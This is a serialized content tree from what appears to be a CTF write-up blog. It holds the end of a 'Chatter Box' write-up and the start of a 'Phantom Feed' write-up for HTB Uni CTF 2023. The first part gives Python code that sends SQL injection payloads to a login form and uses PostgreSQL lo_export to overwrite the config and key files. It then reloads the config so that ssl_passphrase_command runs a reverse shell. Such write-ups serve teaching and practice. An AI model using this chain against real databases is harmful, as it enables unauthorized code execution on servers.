,{"type":38,"value":669},{"type":33,"tag":128,"props":28423,"children":28424},{"style":312},[28425],{"type":38,"value":5584},{"type":33,"tag":128,"props":28427,"children":28428},{"st
yle":306},[28429],{"type":38,"value":10612},{"type":33,"tag":128,"props":28431,"children":28432},{"style":312},[28433],{"type":38,"value":315},{"type":33,"tag":128,"props":28435,"children":28436},{"style":323},[28437],{"type":38,"value":10621},{"type":33,"tag":128,"props":28439,"children":28440},{"style":312},[28441],{"type":38,"value":2427},{"type":33,"tag":128,"props":28443,"children":28444},{"class":130,"line":848},[28445,28449,28453,28457,28461,28465,28470,28474,28478,28482,28487],{"type":33,"tag":128,"props":28446,"children":28447},{"style":323},[28448],{"type":38,"value":28279},{"type":33,"tag":128,"props":28450,"children":28451},{"style":312},[28452],{"type":38,"value":315},{"type":33,"tag":128,"props":28454,"children":28455},{"style":323},[28456],{"type":38,"value":25709},{"type":33,"tag":128,"props":28458,"children":28459},{"style":312},[28460],{"type":38,"value":5566},{"type":33,"tag":128,"props":28462,"children":28463},{"style":300},[28464],{"type":38,"value":11107},{"type":33,"tag":128,"props":28466,"children":28467},{"style":140},[28468],{"type":38,"value":28469},"\"(SELECT lo_export(",{"type":33,"tag":128,"props":28471,"children":28472},{"style":151},[28473],{"type":38,"value":7246},{"type":33,"tag":128,"props":28475,"children":28476},{"style":323},[28477],{"type":38,"value":28309},{"type":33,"tag":128,"props":28479,"children":28480},{"style":151},[28481],{"type":38,"value":5730},{"type":33,"tag":128,"props":28483,"children":28484},{"style":140},[28485],{"type":38,"value":28486},", 
'/etc/postgresql/13/main/postgresql.conf'))\"",{"type":33,"tag":128,"props":28488,"children":28489},{"style":312},[28490],{"type":38,"value":2427},{"type":33,"tag":128,"props":28492,"children":28493},{"class":130,"line":976},[28494,28498,28502,28506,28510,28514,28518,28522,28526,28530,28534,28538,28542,28546,28550,28554,28558,28562,28566,28570,28574,28578,28582,28586],{"type":33,"tag":128,"props":28495,"children":28496},{"style":323},[28497],{"type":38,"value":28346},{"type":33,"tag":128,"props":28499,"children":28500},{"style":312},[28501],{"type":38,"value":315},{"type":33,"tag":128,"props":28503,"children":28504},{"style":323},[28505],{"type":38,"value":10587},{"type":33,"tag":128,"props":28507,"children":28508},{"style":312},[28509],{"type":38,"value":215},{"type":33,"tag":128,"props":28511,"children":28512},{"style":323},[28513],{"type":38,"value":5561},{"type":33,"tag":128,"props":28515,"children":28516},{"style":312},[28517],{"type":38,"value":5566},{"type":33,"tag":128,"props":28519,"children":28520},{"style":151},[28521],{"type":38,"value":28371},{"type":33,"tag":128,"props":28523,"children":28524},{"style":312},[28525],{"type":38,"value":5584},{"type":33,"tag":128,"props":28527,"children":28528},{"style":306},[28529],{"type":38,"value":13545},{"type":33,"tag":128,"props":28531,"children":28532},{"style":312},[28533],{"type":38,"value":315},{"type":33,"tag":128,"props":28535,"children":28536},{"style":676},[28537],{"type":38,"value":669},{"type":33,"tag":128,"props":28539,"children":28540},{"style":140},[28541],{"type":38,"value":28392},{"type":33,"tag":128,"props":28543,"children":28544},{"style":676},[28545],{"type":38,"value":669},{"type":33,"tag":128,"props":28547,"children":28548},{"style":300},[28549],{"type":38,"value":25605},{"type":33,"tag":128,"props":28551,"children":28552},{"style":323},[28553],{"type":38,"value":5810},{"type":33,"tag":128,"props":28555,"children":28556},{"style":300},[28557],{"type":38,"value":25605},{"type":33,"tag":128,"props
":28559,"children":28560},{"style":676},[28561],{"type":38,"value":669},{"type":33,"tag":128,"props":28563,"children":28564},{"style":140},[28565],{"type":38,"value":28417},{"type":33,"tag":128,"props":28567,"children":28568},{"style":676},[28569],{"type":38,"value":669},{"type":33,"tag":128,"props":28571,"children":28572},{"style":312},[28573],{"type":38,"value":5584},{"type":33,"tag":128,"props":28575,"children":28576},{"style":306},[28577],{"type":38,"value":10612},{"type":33,"tag":128,"props":28579,"children":28580},{"style":312},[28581],{"type":38,"value":315},{"type":33,"tag":128,"props":28583,"children":28584},{"style":323},[28585],{"type":38,"value":10621},{"type":33,"tag":128,"props":28587,"children":28588},{"style":312},[28589],{"type":38,"value":2427},{"type":33,"tag":239,"props":28591,"children":28592},{},[28593],{"type":33,"tag":243,"props":28594,"children":28595},{},[28596],{"type":38,"value":28597},"Replace the PG_VERSION file with our key:",{"type":33,"tag":114,"props":28599,"children":28600},{"lang":10227},[28601],{"type":33,"tag":119,"props":28602,"children":28604},{"code":28603,"language":10227,"meta":8,"className":10231,"style":8},"rand_num = rand_num + 1\nwith open(\"files/cert.b64\", \"r\") as f:\n    cert = f.read()\n\nquery = get_payload(f\"(SELECT lo_from_bytea({rand_num}, decode('{cert}', 'base64')))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", headers=headers)\nquery = get_payload(f\"(SELECT lo_export({rand_num}, '/var/lib/postgresql/13/main/PG_VERSION'))\")\nr = requests.post(URL_TARGET, data=\"username=\"+query+\"&passwd=admin\", 
headers=headers)\n",[28605],{"type":33,"tag":105,"props":28606,"children":28607},{"__ignoreMap":8},[28608,28632,28692,28720,28727,28791,28890,28938],{"type":33,"tag":128,"props":28609,"children":28610},{"class":130,"line":131},[28611,28615,28619,28624,28628],{"type":33,"tag":128,"props":28612,"children":28613},{"style":323},[28614],{"type":38,"value":28124},{"type":33,"tag":128,"props":28616,"children":28617},{"style":312},[28618],{"type":38,"value":315},{"type":33,"tag":128,"props":28620,"children":28621},{"style":323},[28622],{"type":38,"value":28623}," rand_num ",{"type":33,"tag":128,"props":28625,"children":28626},{"style":300},[28627],{"type":38,"value":25605},{"type":33,"tag":128,"props":28629,"children":28630},{"style":523},[28631],{"type":38,"value":1338},{"type":33,"tag":128,"props":28633,"children":28634},{"class":130,"line":362},[28635,28639,28643,28647,28651,28656,28660,28664,28668,28672,28676,28680,28684,28688],{"type":33,"tag":128,"props":28636,"children":28637},{"style":1576},[28638],{"type":38,"value":28184},{"type":33,"tag":128,"props":28640,"children":28641},{"style":437},[28642],{"type":38,"value":10725},{"type":33,"tag":128,"props":28644,"children":28645},{"style":312},[28646],{"type":38,"value":5566},{"type":33,"tag":128,"props":28648,"children":28649},{"style":676},[28650],{"type":38,"value":669},{"type":33,"tag":128,"props":28652,"children":28653},{"style":140},[28654],{"type":38,"value":28655},"files/cert.b64",{"type":33,"tag":128,"props":28657,"children":28658},{"style":676},[28659],{"type":38,"value":669},{"type":33,"tag":128,"props":28661,"children":28662},{"style":312},[28663],{"type":38,"value":5584},{"type":33,"tag":128,"props":28665,"children":28666},{"style":676},[28667],{"type":38,"value":679},{"type":33,"tag":128,"props":28669,"children":28670},{"style":140},[28671],{"type":38,"value":10916},{"type":33,"tag":128,"props":28673,"children":28674},{"style":676},[28675],{"type":38,"value":669},{"type":33,"tag":128,"props":28677,"children
":28678},{"style":312},[28679],{"type":38,"value":2966},{"type":33,"tag":128,"props":28681,"children":28682},{"style":1576},[28683],{"type":38,"value":10759},{"type":33,"tag":128,"props":28685,"children":28686},{"style":323},[28687],{"type":38,"value":10534},{"type":33,"tag":128,"props":28689,"children":28690},{"style":312},[28691],{"type":38,"value":5318},{"type":33,"tag":128,"props":28693,"children":28694},{"class":130,"line":403},[28695,28700,28704,28708,28712,28716],{"type":33,"tag":128,"props":28696,"children":28697},{"style":323},[28698],{"type":38,"value":28699},"    cert ",{"type":33,"tag":128,"props":28701,"children":28702},{"style":312},[28703],{"type":38,"value":315},{"type":33,"tag":128,"props":28705,"children":28706},{"style":323},[28707],{"type":38,"value":10534},{"type":33,"tag":128,"props":28709,"children":28710},{"style":312},[28711],{"type":38,"value":215},{"type":33,"tag":128,"props":28713,"children":28714},{"style":323},[28715],{"type":38,"value":10810},{"type":33,"tag":128,"props":28717,"children":28718},{"style":312},[28719],{"type":38,"value":7857},{"type":33,"tag":128,"props":28721,"children":28722},{"class":130,"line":739},[28723],{"type":33,"tag":128,"props":28724,"children":28725},{"emptyLinePlaceholder":896},[28726],{"type":38,"value":899},{"type":33,"tag":128,"props":28728,"children":28729},{"class":130,"line":765},[28730,28734,28738,28742,28746,28750,28754,28758,28762,28766,28770,28774,28779,28783,28787],{"type":33,"tag":128,"props":28731,"children":28732},{"style":323},[28733],{"type":38,"value":28279},{"type":33,"tag":128,"props":28735,"children":28736},{"style":312},[28737],{"type":38,"value":315},{"type":33,"tag":128,"props":28739,"children":28740},{"style":323},[28741],{"type":38,"value":25709},{"type":33,"tag":128,"props":28743,"children":28744},{"style":312},[28745],{"type":38,"value":5566},{"type":33,"tag":128,"props":28747,"children":28748},{"style":300},[28749],{"type":38,"value":11107},{"type":33,"tag":128,"props":28751,"chil
dren":28752},{"style":140},[28753],{"type":38,"value":28300},{"type":33,"tag":128,"props":28755,"children":28756},{"style":151},[28757],{"type":38,"value":7246},{"type":33,"tag":128,"props":28759,"children":28760},{"style":323},[28761],{"type":38,"value":28309},{"type":33,"tag":128,"props":28763,"children":28764},{"style":151},[28765],{"type":38,"value":5730},{"type":33,"tag":128,"props":28767,"children":28768},{"style":140},[28769],{"type":38,"value":11130},{"type":33,"tag":128,"props":28771,"children":28772},{"style":151},[28773],{"type":38,"value":7246},{"type":33,"tag":128,"props":28775,"children":28776},{"style":323},[28777],{"type":38,"value":28778},"cert",{"type":33,"tag":128,"props":28780,"children":28781},{"style":151},[28782],{"type":38,"value":5730},{"type":33,"tag":128,"props":28784,"children":28785},{"style":140},[28786],{"type":38,"value":28334},{"type":33,"tag":128,"props":28788,"children":28789},{"style":312},[28790],{"type":38,"value":2427},{"type":33,"tag":128,"props":28792,"children":28793},{"class":130,"line":804},[28794,28798,28802,28806,28810,28814,28818,28822,28826,28830,28834,28838,28842,28846,28850,28854,28858,28862,28866,28870,28874,28878,28882,28886],{"type":33,"tag":128,"props":28795,"children":28796},{"style":323},[28797],{"type":38,"value":28346},{"type":33,"tag":128,"props":28799,"children":28800},{"style":312},[28801],{"type":38,"value":315},{"type":33,"tag":128,"props":28803,"children":28804},{"style":323},[28805],{"type":38,"value":10587},{"type":33,"tag":128,"props":28807,"children":28808},{"style":312},[28809],{"type":38,"value":215},{"type":33,"tag":128,"props":28811,"children":28812},{"style":323},[28813],{"type":38,"value":5561},{"type":33,"tag":128,"props":28815,"children":28816},{"style":312},[28817],{"type":38,"value":5566},{"type":33,"tag":128,"props":28819,"children":28820},{"style":151},[28821],{"type":38,"value":28371},{"type":33,"tag":128,"props":28823,"children":28824},{"style":312},[28825],{"type":38,"value":5584},{"t
ype":33,"tag":128,"props":28827,"children":28828},{"style":306},[28829],{"type":38,"value":13545},{"type":33,"tag":128,"props":28831,"children":28832},{"style":312},[28833],{"type":38,"value":315},{"type":33,"tag":128,"props":28835,"children":28836},{"style":676},[28837],{"type":38,"value":669},{"type":33,"tag":128,"props":28839,"children":28840},{"style":140},[28841],{"type":38,"value":28392},{"type":33,"tag":128,"props":28843,"children":28844},{"style":676},[28845],{"type":38,"value":669},{"type":33,"tag":128,"props":28847,"children":28848},{"style":300},[28849],{"type":38,"value":25605},{"type":33,"tag":128,"props":28851,"children":28852},{"style":323},[28853],{"type":38,"value":5810},{"type":33,"tag":128,"props":28855,"children":28856},{"style":300},[28857],{"type":38,"value":25605},{"type":33,"tag":128,"props":28859,"children":28860},{"style":676},[28861],{"type":38,"value":669},{"type":33,"tag":128,"props":28863,"children":28864},{"style":140},[28865],{"type":38,"value":28417},{"type":33,"tag":128,"props":28867,"children":28868},{"style":676},[28869],{"type":38,"value":669},{"type":33,"tag":128,"props":28871,"children":28872},{"style":312},[28873],{"type":38,"value":5584},{"type":33,"tag":128,"props":28875,"children":28876},{"style":306},[28877],{"type":38,"value":10612},{"type":33,"tag":128,"props":28879,"children":28880},{"style":312},[28881],{"type":38,"value":315},{"type":33,"tag":128,"props":28883,"children":28884},{"style":323},[28885],{"type":38,"value":10621},{"type":33,"tag":128,"props":28887,"children":28888},{"style":312},[28889],{"type":38,"value":2427},{"type":33,"tag":128,"props":28891,"children":28892},{"class":130,"line":839},[28893,28897,28901,28905,28909,28913,28917,28921,28925,28929,28934],{"type":33,"tag":128,"props":28894,"children":28895},{"style":323},[28896],{"type":38,"value":28279},{"type":33,"tag":128,"props":28898,"children":28899},{"style":312},[28900],{"type":38,"value":315},{"type":33,"tag":128,"props":28902,"children":28903},{"s
tyle":323},[28904],{"type":38,"value":25709},{"type":33,"tag":128,"props":28906,"children":28907},{"style":312},[28908],{"type":38,"value":5566},{"type":33,"tag":128,"props":28910,"children":28911},{"style":300},[28912],{"type":38,"value":11107},{"type":33,"tag":128,"props":28914,"children":28915},{"style":140},[28916],{"type":38,"value":28469},{"type":33,"tag":128,"props":28918,"children":28919},{"style":151},[28920],{"type":38,"value":7246},{"type":33,"tag":128,"props":28922,"children":28923},{"style":323},[28924],{"type":38,"value":28309},{"type":33,"tag":128,"props":28926,"children":28927},{"style":151},[28928],{"type":38,"value":5730},{"type":33,"tag":128,"props":28930,"children":28931},{"style":140},[28932],{"type":38,"value":28933},", '/var/lib/postgresql/13/main/PG_VERSION'))\"",{"type":33,"tag":128,"props":28935,"children":28936},{"style":312},[28937],{"type":38,"value":2427},{"type":33,"tag":128,"props":28939,"children":28940},{"class":130,"line":848},[28941,28945,28949,28953,28957,28961,28965,28969,28973,28977,28981,28985,28989,28993,28997,29001,29005,29009,29013,29017,29021,29025,29029,29033],{"type":33,"tag":128,"props":28942,"children":28943},{"style":323},[28944],{"type":38,"value":28346},{"type":33,"tag":128,"props":28946,"children":28947},{"style":312},[28948],{"type":38,"value":315},{"type":33,"tag":128,"props":28950,"children":28951},{"style":323},[28952],{"type":38,"value":10587},{"type":33,"tag":128,"props":28954,"children":28955},{"style":312},[28956],{"type":38,"value":215},{"type":33,"tag":128,"props":28958,"children":28959},{"style":323},[28960],{"type":38,"value":5561},{"type":33,"tag":128,"props":28962,"children":28963},{"style":312},[28964],{"type":38,"value":5566},{"type":33,"tag":128,"props":28966,"children":28967},{"style":151},[28968],{"type":38,"value":28371},{"type":33,"tag":128,"props":28970,"children":28971},{"style":312},[28972],{"type":38,"value":5584},{"type":33,"tag":128,"props":28974,"children":28975},{"style":306},[28976],{"
type":38,"value":13545},{"type":33,"tag":128,"props":28978,"children":28979},{"style":312},[28980],{"type":38,"value":315},{"type":33,"tag":128,"props":28982,"children":28983},{"style":676},[28984],{"type":38,"value":669},{"type":33,"tag":128,"props":28986,"children":28987},{"style":140},[28988],{"type":38,"value":28392},{"type":33,"tag":128,"props":28990,"children":28991},{"style":676},[28992],{"type":38,"value":669},{"type":33,"tag":128,"props":28994,"children":28995},{"style":300},[28996],{"type":38,"value":25605},{"type":33,"tag":128,"props":28998,"children":28999},{"style":323},[29000],{"type":38,"value":5810},{"type":33,"tag":128,"props":29002,"children":29003},{"style":300},[29004],{"type":38,"value":25605},{"type":33,"tag":128,"props":29006,"children":29007},{"style":676},[29008],{"type":38,"value":669},{"type":33,"tag":128,"props":29010,"children":29011},{"style":140},[29012],{"type":38,"value":28417},{"type":33,"tag":128,"props":29014,"children":29015},{"style":676},[29016],{"type":38,"value":669},{"type":33,"tag":128,"props":29018,"children":29019},{"style":312},[29020],{"type":38,"value":5584},{"type":33,"tag":128,"props":29022,"children":29023},{"style":306},[29024],{"type":38,"value":10612},{"type":33,"tag":128,"props":29026,"children":29027},{"style":312},[29028],{"type":38,"value":315},{"type":33,"tag":128,"props":29030,"children":29031},{"style":323},[29032],{"type":38,"value":10621},{"type":33,"tag":128,"props":29034,"children":29035},{"style":312},[29036],{"type":38,"value":2427},{"type":33,"tag":239,"props":29038,"children":29039},{},[29040],{"type":33,"tag":243,"props":29041,"children":29042},{},[29043],{"type":38,"value":29044},"Reload the postgresql configuration:",{"type":33,"tag":114,"props":29046,"children":29047},{"lang":10227},[29048],{"type":33,"tag":119,"props":29049,"children":29051},{"code":29050,"language":10227,"meta":8,"className":10231,"style":8},"query = get_payload(f\"SELECT pg_reload_conf()\")\nr = requests.post(URL_TARGET, 
data=\"username=\"+query+\"&passwd=admin\", headers=headers)\n",[29052],{"type":33,"tag":105,"props":29053,"children":29054},{"__ignoreMap":8},[29055,29086],{"type":33,"tag":128,"props":29056,"children":29057},{"class":130,"line":131},[29058,29062,29066,29070,29074,29078,29082],{"type":33,"tag":128,"props":29059,"children":29060},{"style":323},[29061],{"type":38,"value":28279},{"type":33,"tag":128,"props":29063,"children":29064},{"style":312},[29065],{"type":38,"value":315},{"type":33,"tag":128,"props":29067,"children":29068},{"style":323},[29069],{"type":38,"value":25709},{"type":33,"tag":128,"props":29071,"children":29072},{"style":312},[29073],{"type":38,"value":5566},{"type":33,"tag":128,"props":29075,"children":29076},{"style":300},[29077],{"type":38,"value":11107},{"type":33,"tag":128,"props":29079,"children":29080},{"style":140},[29081],{"type":38,"value":11410},{"type":33,"tag":128,"props":29083,"children":29084},{"style":312},[29085],{"type":38,"value":2427},{"type":33,"tag":128,"props":29087,"children":29088},{"class":130,"line":362},[29089,29093,29097,29101,29105,29109,29113,29117,29121,29125,29129,29133,29137,29141,29145,29149,29153,29157,29161,29165,29169,29173,29177,29181],{"type":33,"tag":128,"props":29090,"children":29091},{"style":323},[29092],{"type":38,"value":28346},{"type":33,"tag":128,"props":29094,"children":29095},{"style":312},[29096],{"type":38,"value":315},{"type":33,"tag":128,"props":29098,"children":29099},{"style":323},[29100],{"type":38,"value":10587},{"type":33,"tag":128,"props":29102,"children":29103},{"style":312},[29104],{"type":38,"value":215},{"type":33,"tag":128,"props":29106,"children":29107},{"style":323},[29108],{"type":38,"value":5561},{"type":33,"tag":128,"props":29110,"children":29111},{"style":312},[29112],{"type":38,"value":5566},{"type":33,"tag":128,"props":29114,"children":29115},{"style":151},[29116],{"type":38,"value":28371},{"type":33,"tag":128,"props":29118,"children":29119},{"style":312},[29120],{"type":38,"value"
:5584},{"type":33,"tag":128,"props":29122,"children":29123},{"style":306},[29124],{"type":38,"value":13545},{"type":33,"tag":128,"props":29126,"children":29127},{"style":312},[29128],{"type":38,"value":315},{"type":33,"tag":128,"props":29130,"children":29131},{"style":676},[29132],{"type":38,"value":669},{"type":33,"tag":128,"props":29134,"children":29135},{"style":140},[29136],{"type":38,"value":28392},{"type":33,"tag":128,"props":29138,"children":29139},{"style":676},[29140],{"type":38,"value":669},{"type":33,"tag":128,"props":29142,"children":29143},{"style":300},[29144],{"type":38,"value":25605},{"type":33,"tag":128,"props":29146,"children":29147},{"style":323},[29148],{"type":38,"value":5810},{"type":33,"tag":128,"props":29150,"children":29151},{"style":300},[29152],{"type":38,"value":25605},{"type":33,"tag":128,"props":29154,"children":29155},{"style":676},[29156],{"type":38,"value":669},{"type":33,"tag":128,"props":29158,"children":29159},{"style":140},[29160],{"type":38,"value":28417},{"type":33,"tag":128,"props":29162,"children":29163},{"style":676},[29164],{"type":38,"value":669},{"type":33,"tag":128,"props":29166,"children":29167},{"style":312},[29168],{"type":38,"value":5584},{"type":33,"tag":128,"props":29170,"children":29171},{"style":306},[29172],{"type":38,"value":10612},{"type":33,"tag":128,"props":29174,"children":29175},{"style":312},[29176],{"type":38,"value":315},{"type":33,"tag":128,"props":29178,"children":29179},{"style":323},[29180],{"type":38,"value":10621},{"type":33,"tag":128,"props":29182,"children":29183},{"style":312},[29184],{"type":38,"value":2427},{"type":33,"tag":47,"props":29186,"children":29187},{},[29188,29190,29196,29198,29204],{"type":38,"value":29189},"Note that the ",{"type":33,"tag":105,"props":29191,"children":29193},{"className":29192},[],[29194],{"type":38,"value":29195},"get_payload()",{"type":38,"value":29197}," function allows us to generate our SQL injection payload as seen previously in 
",{"type":33,"tag":53,"props":29199,"children":29201},{"href":29200},"#sql-injection",[29202],{"type":38,"value":29203},"part 3",{"type":38,"value":215},{"type":33,"tag":47,"props":29206,"children":29207},{},[29208],{"type":38,"value":29209},"After the configuration is reloaded, PostgreSQL runs ssl_passphrase_command to open the new key file (ssl_passphrase_command_supports_reload is on), which executes our reverse shell with the privileges of the database server process and lets us retrieve the flag.",{"type":33,"tag":75,"props":29211,"children":29213},{"imgSrc":29212},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706559298/writeups/chatter-box/rev_shell.webp",[],{"type":33,"tag":5227,"props":29215,"children":29216},{},[29217],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":29219},[29220,29221,29222,29223,29224],{"id":42,"depth":362,"text":45},{"id":22881,"depth":362,"text":22884},{"id":25541,"depth":362,"text":25544},{"id":27685,"depth":362,"text":27688},{"id":21053,"depth":362,"text":21056},"content:writeups:chatter-box.md","writeups/chatter-box.md","writeups/chatter-box",{"_path":29229,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":29230,"description":8,"head":29231,"body":29249,"_type":5240,"_id":35014,"_source":5242,"_file":35015,"_stem":35016,"_extension":5245},"/writeups/phantom-feed","Phantom Feed",{"title":29230,"description":29232,"keywords":29233,"slug":29234,"image":29235,"date":29236,"meta":29237},"Writeup of Phantom Feed, a hard web challenge from htb-uni ctf 2023. 
Is about race condition and XSS.","web,race-condition,xss,oauth2,CVE-2023-33733","phantom-feed","https://res.cloudinary.com/dmju5zuhr/image/upload/v1704230872/writeups/htb-uni-2023.webp","2023-12-08",[29238,29239,29240,29241,29242,29244,29245,29247],{"og:image":29235},{"og:title":29230},{"og:description":29232},{"og:type":21},{"og:url":29243},"https://owalid.com/phantom-feed",{"description":29232},{"title":29246},"Phantom Feed writeup",{"keywords":29248},"web,race-condition,xss,oauth2,CVE-2023-33733,htb,ctf,writeup",{"type":30,"children":29250,"toc":35007},[29251,29255,29259,29264,29269,29274,29437,29443,29448,29454,29459,29467,29500,29508,29513,29519,29524,29531,29544,29551,29556,29562,29568,29573,29588,29594,29599,29603,29608,29612,29625,30061,30314,30319,30586,30591,30603,30641,30646,31030,31035,31040,31410,31415,31419,31424,31429,31433,31438,31442,31448,31453,31473,32133,32138,32144,32157,32162,32206,32209,32247,32251,32306,32326,32331,32335,32340,32344,32365,32369,32374,32379,32467,32472,33474,33479,33484,33497,33502,33506,33511,33548,33572,33584,33588,33594,33607,33626,33638,33642,33647,33651,33656,33660,33665,33671,33676,34285,34305,34317,34427,34432,34437,34928,34941,34955,34963,34968,34985,34990,34994,34999,35003],{"type":33,"tag":34,"props":29252,"children":29253},{"id":29234},[29254],{"type":38,"value":29230},{"type":33,"tag":40,"props":29256,"children":29257},{"id":42},[29258],{"type":38,"value":45},{"type":33,"tag":47,"props":29260,"children":29261},{},[29262],{"type":38,"value":29263},"Phantom Feed is a hard web challenge from htb-uni ctf 2023. 
There are a lot of files in this chal, in total there are 3 web services running.",{"type":33,"tag":75,"props":29265,"children":29268},{"imgSrc":29266,":width":29267},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704223463/writeups/phantom-feed/folder-expanded.webp","300",[],{"type":33,"tag":47,"props":29270,"children":29271},{},[29272],{"type":38,"value":29273},"Below you will find the nginx configuration for the challenges:",{"type":33,"tag":114,"props":29275,"children":29276},{"lang":8945},[29277],{"type":33,"tag":119,"props":29278,"children":29280},{"className":8949,"code":29279,"language":8945,"meta":8,"style":8},"http {\n    server {\n        listen 1337;\n        server_name pantomfeed;\n        \n        location / {\n            proxy_pass http://127.0.0.1:5000;\n        }\n\n        location /phantomfeed {\n            proxy_pass http://127.0.0.1:3000;\n            proxy_set_header Host $host;\n            proxy_set_header X-Real-IP $remote_addr;\n        }\n\n        location /backend {\n            proxy_pass http://127.0.0.1:4000;\n        }\n    }\n}\n",[29281],{"type":33,"tag":105,"props":29282,"children":29283},{"__ignoreMap":8},[29284,29292,29300,29308,29316,29324,29332,29340,29347,29354,29362,29370,29378,29386,29393,29400,29408,29416,29423,29430],{"type":33,"tag":128,"props":29285,"children":29286},{"class":130,"line":131},[29287],{"type":33,"tag":128,"props":29288,"children":29289},{},[29290],{"type":38,"value":29291},"http {\n",{"type":33,"tag":128,"props":29293,"children":29294},{"class":130,"line":362},[29295],{"type":33,"tag":128,"props":29296,"children":29297},{},[29298],{"type":38,"value":29299},"    server {\n",{"type":33,"tag":128,"props":29301,"children":29302},{"class":130,"line":403},[29303],{"type":33,"tag":128,"props":29304,"children":29305},{},[29306],{"type":38,"value":29307},"        listen 
1337;\n",{"type":33,"tag":128,"props":29309,"children":29310},{"class":130,"line":739},[29311],{"type":33,"tag":128,"props":29312,"children":29313},{},[29314],{"type":38,"value":29315},"        server_name pantomfeed;\n",{"type":33,"tag":128,"props":29317,"children":29318},{"class":130,"line":765},[29319],{"type":33,"tag":128,"props":29320,"children":29321},{},[29322],{"type":38,"value":29323},"        \n",{"type":33,"tag":128,"props":29325,"children":29326},{"class":130,"line":804},[29327],{"type":33,"tag":128,"props":29328,"children":29329},{},[29330],{"type":38,"value":29331},"        location / {\n",{"type":33,"tag":128,"props":29333,"children":29334},{"class":130,"line":839},[29335],{"type":33,"tag":128,"props":29336,"children":29337},{},[29338],{"type":38,"value":29339},"            proxy_pass http://127.0.0.1:5000;\n",{"type":33,"tag":128,"props":29341,"children":29342},{"class":130,"line":848},[29343],{"type":33,"tag":128,"props":29344,"children":29345},{},[29346],{"type":38,"value":15318},{"type":33,"tag":128,"props":29348,"children":29349},{"class":130,"line":976},[29350],{"type":33,"tag":128,"props":29351,"children":29352},{"emptyLinePlaceholder":896},[29353],{"type":38,"value":899},{"type":33,"tag":128,"props":29355,"children":29356},{"class":130,"line":988},[29357],{"type":33,"tag":128,"props":29358,"children":29359},{},[29360],{"type":38,"value":29361},"        location /phantomfeed {\n",{"type":33,"tag":128,"props":29363,"children":29364},{"class":130,"line":1001},[29365],{"type":33,"tag":128,"props":29366,"children":29367},{},[29368],{"type":38,"value":29369},"            proxy_pass http://127.0.0.1:3000;\n",{"type":33,"tag":128,"props":29371,"children":29372},{"class":130,"line":1014},[29373],{"type":33,"tag":128,"props":29374,"children":29375},{},[29376],{"type":38,"value":29377},"            proxy_set_header Host 
$host;\n",{"type":33,"tag":128,"props":29379,"children":29380},{"class":130,"line":1026},[29381],{"type":33,"tag":128,"props":29382,"children":29383},{},[29384],{"type":38,"value":29385},"            proxy_set_header X-Real-IP $remote_addr;\n",{"type":33,"tag":128,"props":29387,"children":29388},{"class":130,"line":1038},[29389],{"type":33,"tag":128,"props":29390,"children":29391},{},[29392],{"type":38,"value":15318},{"type":33,"tag":128,"props":29394,"children":29395},{"class":130,"line":1051},[29396],{"type":33,"tag":128,"props":29397,"children":29398},{"emptyLinePlaceholder":896},[29399],{"type":38,"value":899},{"type":33,"tag":128,"props":29401,"children":29402},{"class":130,"line":1063},[29403],{"type":33,"tag":128,"props":29404,"children":29405},{},[29406],{"type":38,"value":29407},"        location /backend {\n",{"type":33,"tag":128,"props":29409,"children":29410},{"class":130,"line":1076},[29411],{"type":33,"tag":128,"props":29412,"children":29413},{},[29414],{"type":38,"value":29415},"            proxy_pass http://127.0.0.1:4000;\n",{"type":33,"tag":128,"props":29417,"children":29418},{"class":130,"line":1089},[29419],{"type":33,"tag":128,"props":29420,"children":29421},{},[29422],{"type":38,"value":15318},{"type":33,"tag":128,"props":29424,"children":29425},{"class":130,"line":1101},[29426],{"type":33,"tag":128,"props":29427,"children":29428},{},[29429],{"type":38,"value":6760},{"type":33,"tag":128,"props":29431,"children":29432},{"class":130,"line":1114},[29433],{"type":33,"tag":128,"props":29434,"children":29435},{},[29436],{"type":38,"value":854},{"type":33,"tag":81,"props":29438,"children":29440},{"id":29439},"port-5000",[29441],{"type":38,"value":29442},"Port 5000:",{"type":33,"tag":47,"props":29444,"children":29445},{},[29446],{"type":38,"value":29447},"This service is a Vue.js application, this frontend application interacts with the backend service 
(4000).",{"type":33,"tag":81,"props":29449,"children":29451},{"id":29450},"port-3000",[29452],{"type":38,"value":29453},"Port 3000:",{"type":33,"tag":47,"props":29455,"children":29456},{},[29457],{"type":38,"value":29458},"This service is Flask application it allows a user to log in and generate a token via oauth2 to use in the Vue.js application.",{"type":33,"tag":47,"props":29460,"children":29461},{},[29462],{"type":33,"tag":2302,"props":29463,"children":29464},{},[29465],{"type":38,"value":29466},"Interesting routes:",{"type":33,"tag":239,"props":29468,"children":29469},{},[29470,29475,29480,29485,29490,29495],{"type":33,"tag":243,"props":29471,"children":29472},{},[29473],{"type":38,"value":29474},"GET/POST /login - No middleware - Renders a login form (GET) and handles user authentication (POST).",{"type":33,"tag":243,"props":29476,"children":29477},{},[29478],{"type":38,"value":29479},"GET/POST /register - No middleware - Renders a registration form (GET) and handles user registration (POST).",{"type":33,"tag":243,"props":29481,"children":29482},{},[29483],{"type":38,"value":29484},"GET/POST /feed - auth_middleware - Displays posts (GET) and creates new posts (POST) after parameter validation, it also handles the bot (POST).",{"type":33,"tag":243,"props":29486,"children":29487},{},[29488],{"type":38,"value":29489},"GET /oauth2/auth - auth_middleware - Manages OAuth2 authorization by rendering an authorization page.",{"type":33,"tag":243,"props":29491,"children":29492},{},[29493],{"type":38,"value":29494},"GET /oauth2/code - auth_middleware - Generates an authorization code and redirects to the specified redirect_url.",{"type":33,"tag":243,"props":29496,"children":29497},{},[29498],{"type":38,"value":29499},"GET /oauth2/token - auth_middleware - Validates an authorization code and generates an access token in JSON 
